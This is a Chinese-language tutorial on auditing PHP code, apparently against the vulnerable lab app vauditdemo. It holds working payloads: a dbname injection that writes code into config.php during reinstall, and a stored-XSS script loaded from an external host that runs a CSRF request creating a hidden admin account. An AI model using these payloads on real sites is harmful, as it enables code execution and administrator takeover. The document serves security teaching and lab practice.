安装问题的审计
一般PHP程序都有一个初始安装的功能。 当程序安装后一般会自动删除安装文件、或者加lock限制。
安装功能可能存在以下问题:
- 无验证功能,任意重装覆盖
$_GET['step']跳过限制步骤- 变量覆盖导致重装
- 判断lock后跳转无exit
- 解析install.php.bak漏洞
- 其他特定功能绕过漏洞
安装问题分析
- 首先查看install.php发现在判断存在lock文件后无exit。
再继续查看代码发现,dbname在写入config.php时未做过滤。
if (in_array(strtolower($dbname), $data)){
mysql_close();
echo "<script>if(!alert('數據庫已存在')){window.history.back(-1);}</script>";
exit();
}
...
mysql_query( "CREATE DATABASE $dbname", $con ) or die ( mysql_error() );
$fp=fopen( "../sys/config.php", "w" );
fwrite( $fp, $str_tmp );
fclose( $fp );查看config.php,构造payload
闭合双引号,然后在后面跟上我们要执行的代码,注释掉后面的内容。
$host="localhost";
$username="root";
$password="root";
$database="vauditdemo"; // exp;-- -";phpinfo();//返回到install.php中注释掉lock后的跳转语句,访问install.php并在进入重装页面使用burpsuite抓包。
if ( file_exists($_SERVER["DOCUMENT_ROOT"].'/sys/install.lock') ) {
// header( "Location: ../index.php" );
}抓包修改dbname的值为我们构造的payload。
POST /vauditdemo/install/install.php HTTP/1.1
Host: 192.168.174.195
Content-Length: 84
Cache-Control: max-age=0
Origin: http://192.168.174.195
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.174.195/vauditdemo/install/install.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
dbhost=localhost&dbuser=root&dbpass=root&dbname=exp;-- -";phpinfo();//&Submit=%E5%AE%89%E8%A3%9D抓包后,将install.php中的跳转语句的注释取消。
发送payload后,然后查看config.php中的dbname内容,可以看到payload已经成功被写入config.php文件中。
访问config.php即可显示phpinfo()信息。
审计思路总结
判断lock后跳转无exit
XSS后台敏感操作
查看如下代码:获取源IP的方式是先判断是否存在HTTP_CLIENT_IP字段,若没有再查看是否存在HTTP_X_FORWARDED_FOR字段,若无,则通过REMOTE_ADDR获取,而我们可以控制的只有HTTP_CLIENT_IP和X_FORWARDED_FOR字段,可以达到注入的目的。
function get_client_ip(){
if ($_SERVER["HTTP_CLIENT_IP"] && strcasecmp($_SERVER["HTTP_CLIENT_IP"], "unknown")){
$ip = $_SERVER["HTTP_CLIENT_IP"];
}else if ($_SERVER["HTTP_X_FORWARDED_FOR"] && strcasecmp($_SERVER["HTTP_X_FORWARDED_FOR"], "unknown")){
$ip = $_SERVER["HTTP_X_FORWARDED_FOR"];
}else if ($_SERVER["REMOTE_ADDR"] && strcasecmp($_SERVER["REMOTE_ADDR"], "unknown")){
$ip = $_SERVER["REMOTE_ADDR"];
}else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown")){
$ip = $_SERVER['REMOTE_ADDR'];
}else{
$ip = "unknown";
}
return($ip);
}然后我们通过回溯来找出get_client_ip函数在哪里都有使用。
if (isset($_POST['submit']) && !empty($_POST['user']) && !empty($_POST['pass'])) {
$clean_name = clean_input($_POST['user']);
$clean_pass = clean_input($_POST['pass']);
$query = "SELECT * FROM users WHERE user_name = '$clean_name' AND user_pass = SHA('$clean_pass')";
$data = mysql_query($query, $conn) or die('Error!!');
if (mysql_num_rows($data) == 1) {
$row = mysql_fetch_array($data);
$_SESSION['username'] = $row['user_name'];
$_SESSION['avatar'] = $row['user_avatar'];
$ip = sqlwaf(get_client_ip());
$query = "UPDATE users SET login_ip = '$ip' WHERE user_id = '$row[user_id]'";
mysql_query($query, $conn) or die("updata error!");
header('Location: user.php');
}
else {
$_SESSION['error_info'] = '用户名或密码错误';
header('Location: login.php');
}
mysql_close($conn);
}通过分析可以知道在登录时进行了获取IP的操作,并且get_client_ip()使用sqlwaf过滤器进行了过滤,并且
$ip使用单引号进行包裹,因此无法进行SQL注入。
由于sqlwaf()过滤器只是进行了SQL注入的过滤,并没有XSS的过滤,因此此处我们可以使用XSS注入攻击。
login_ip = '$ip,我们只要找到login_ip所在位置,当数据库字段数允许达到一定的要求,即可进行xss注入。全局搜索login_ip,发现在manageUser.php中存在login_ip. 从数据库字段信息中可以看到该字段设置了255个字符长度。
C:phpstudy_proWWWvauditdemoadminmanageUser.php:
24 <td>我们可以在登录时构造插入xss代码,使用xss引入外部js代码来执行添加用户操作,当管理员触发了xss,即可添加一个新用户。
if (mysql_num_rows($data) == 1) {
$row = mysql_fetch_array($data);
$_SESSION['username'] = $row['user_name'];
$_SESSION['avatar'] = $row['user_avatar'];
$ip = sqlwaf(get_client_ip());
// <script src="http://www.code.com/csrfdemo.js"></script>
$query = "UPDATE users SET login_ip = '$ip' WHERE user_id = '$row[user_id]'";
mysql_query($query, $conn) or die("updata error!");
header('Location: user.php');
}
else {
$_SESSION['error_info'] = '用户名或密码错误';
header('Location: login.php');
}js:将csrf的payload放在远程服务器上。
(function () {
var xmlHttp;
try {
xmlHttp = new XMLHttpRequest();
} catch (e) {
try {
xmlHttp = new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
try {
xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
} catch (e) {
}
}
}
xmlHttp.open("POST","manageAdmin.php",true);
xmlHttp.setRequestHeader('Content-type','application/x-www-form-urlencoded');
xmlHttp.send('username=xss&password=123456' || null);
}) ();xss代码执行后,成功添加了一个管理员用户xss
Name Manege
admin 删除
xss 删除